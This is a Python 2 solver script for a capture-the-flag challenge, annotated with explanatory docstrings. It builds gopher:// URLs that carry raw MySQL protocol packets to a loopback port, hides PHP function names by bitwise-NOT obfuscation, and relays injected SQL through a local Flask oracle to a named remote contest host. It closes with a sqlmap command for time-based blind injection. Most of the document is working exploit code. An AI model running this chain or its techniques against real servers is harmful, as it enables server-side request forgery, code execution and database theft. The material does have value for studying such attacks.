solver.py

  1. #coding: utf-8
  2.  
  3. import requests
  4.  
class MySQL():
    """Build a gopher:// URL carrying a raw MySQL login packet plus one query.

    Python 2 only: the class relies on ``str.encode("hex")`` /
    ``str.decode("hex")`` and on ``print`` statements, none of which exist
    in Python 3.

    Every statement in the class body runs once at import time, not per
    instance: it prints the banner, derives ``auth`` from ``user`` and leaves
    ``dump``/``query``/``auth`` behind as class attributes.  The packet bytes
    are hard-coded hex; the ASCII readable inside them includes the auth
    plugin name ``mysql_native_password`` and no password field, which is why
    the banner insists the account must be unprotected.

    Defensive reading: the URL only does anything where a server-side fetcher
    follows ``gopher://`` to a loopback port.  Refusing non-HTTP schemes and
    loopback/internal destinations in that fetcher, and never running a MySQL
    account without a password, each neutralise it.
    """
    print "\033[31m"+"For making it work username should not be password protected!!!"+ "\033[0m"
    user = 'admin' #raw_input("\033[96m" +"\nGive MySQL username: " + "\033[0m")
    encode_user = user.encode("hex")  # username as hex, spliced into the packet below
    user_length = len(user)
    temp = user_length - 4
    # Leading byte of the packet, adjusted by the username length: it is 0xa3
    # exactly when the username has 4 characters.  Presumably the low byte of
    # the MySQL packet-length header -- the page does not explain the constant.
    length = (chr(0xa3+temp)).encode("hex")

    dump = length + "00000185a6ff0100000001210000000000000000000000000000000000000000000000"
    dump +=  encode_user
    # The remaining hex spells "mysql_native_password" followed by connection
    # attributes (client name, pid, version, platform) in ASCII.
    dump += "00006d7973716c5f6e61746976655f70617373776f7264066035f6f73054c696e75780c5f636c69656e745f6e616d65086c".replace("66035f6f73", "66035f6f73") if False else "00006d7973716c5f6e61746976655f70617373776f726466035f6f73054c696e75780c5f636c69656e745f6e616d65086c" if False else "00006d7973716c5f6e61746976655f70617373776f72640066035f6f73054c696e75780c5f636c69656e745f6e616d65086c"
    dump += "69626d7973716c045f7069640532373235350f5f636c69656e745f76657273696f6e06352e372e3232095f706c6174666f726d"
    dump += "067838365f36340c70726f6772616d5f6e616d65056d7973716c"

    query = "show databases;";#raw_input("\033[96m" +"Give query to execute: "+ "\033[0m")

    auth = dump.replace("\n","")  # no-op as written: dump contains no newlines

    def encode(self, s):
        """Turn an even-length hex string into a gopher URL with one %XX escape per byte.

        Each two-character slice of ``s`` becomes one ``%hh`` escape after the
        gopher ``_`` selector prefix.  The commented-out line targeted MySQL's
        default port 3306; the live one targets 8787 (the page does not say
        what listens there).
        """
        a = [s[i:i + 2] for i in range(0, len(s), 2)]
        #return "gopher://127.0.0.1:3306/_%" + "%".join(a)
        return "gopher://127.0.0.1:8787/_%" + "%".join(a)


    def get_payload(self, query):
        """Append ``query`` to ``auth`` as one more MySQL packet and gopher-encode the result.

        ``query`` (the parameter shadows the class attribute of the same name)
        is hex-encoded; its packet length (query bytes + 1 for the command
        byte) is written as 3 little-endian bytes, then ``00`` (sequence id)
        and ``03`` (MySQL's COM_QUERY command byte) precede the query.  The
        fixed ``0100000001`` trailer is a one-byte packet with command ``01``,
        presumably COM_QUIT.

        Returns the gopher URL string.  The blank-query branch calls the
        unqualified name ``encode`` (no ``self.``) and therefore raises
        NameError in Python 2 as written.
        """
        if(query.strip()!=''):
            query = query.encode("hex")
            query_length = '{:06x}'.format((int((len(query) / 2) + 1)))
            # big-endian hex -> bytes -> reversed -> hex, i.e. little-endian
            query_length = query_length.decode('hex')[::-1].encode('hex')
            pay1 = query_length + "0003" + query
            final = self.encode(self.auth + pay1 + "0100000001")
            return final
        else:
            return encode(self.auth)
  39.  
  40.  
  41. # coding: utf-8
  42. from flask import Flask, render_template, request
  43.  
# Templates are resolved from the working directory; nothing below calls
# render_template, so that import is unused.
app = Flask(__name__, template_folder='.')
  45.  
  46. import time
@app.route('/')
def blind():
    """Local HTTP oracle: forward ``?username=`` into the MySQL payload and relay it to the remote target.

    Returns ``"1"`` when the upstream request completes within 1.5 s and
    ``"0"`` after a 4 s pause when it times out or fails for any reason, so a
    caller polling this route observes a timing difference.  The trailing
    ``return r.content`` is unreachable: both branches of the try return
    first.

    Python 2 only (``print`` statements).
    """
    username = request.args.get('username')  # untrusted; interpolated unescaped into the SQL below
    url = "http://localhost/gg.php"  # dead assignment, overwritten on the next line
    url = "http://warmup.balsnctf.com/"
    def n(s):
        # Bitwise-NOT every byte and prefix "~", so the characters of ``s`` do
        # not appear literally in the request.  Presumably consumed as a PHP
        # ``~`` string expression on the receiving side -- not verifiable here.
        r = ""
        for i in s:
            r += chr(~(ord(i)) & 0xFF)
        r = "~{}".format(r)
        return r

    # Looks like it is meant to evaluate to getenv('HTTP_X') server-side, i.e.
    # to read back the ``X`` header set below -- inferred, not shown on the page.
    t = '(' + n('getenv') + ')(' +n('HTTP_X') + ')'
    # x = MySQL().get_payload("select IF(TRUE AND (select '1'='{username}'), sleep(10), sleep(0));".format(username=username))
    x = MySQL().get_payload("select id from (select 1 as id)a where id='{username}';".format(username=username))

    print repr(x)  # debug output only
    print len(t)
    try:
        r = requests.post(url=url, params = {
            'op' : '-9',
            'Σ>―(#°ω°#)♡→' : t
            },
            cookies = {"PHPSESSID" : "123"},
            headers = {"X": x},
            timeout = 1.5
            )
        return "1"
    except:
        # Bare except: every failure (timeout, connection error, even
        # KeyboardInterrupt) is folded into the slow branch.
        time.sleep(4)
        return "0"
    return r.content
  80.  
  81.  
  82.  
if __name__ == "__main__":
    # debug=True together with host 0.0.0.0 exposes Flask's interactive
    # debugger to every host that can reach the listening port.
    app.run(host='0.0.0.0', debug=True)
  85.  
# Usage note kept as a bare string literal: it is evaluated and discarded at
# import time and has no runtime effect (a comment would be clearer).
'''
python sqlmap.py -u "http://localhost:5000/?username=*" --technique=T --dbms=mysql --dbs  --level 1 --time-sec=2
'''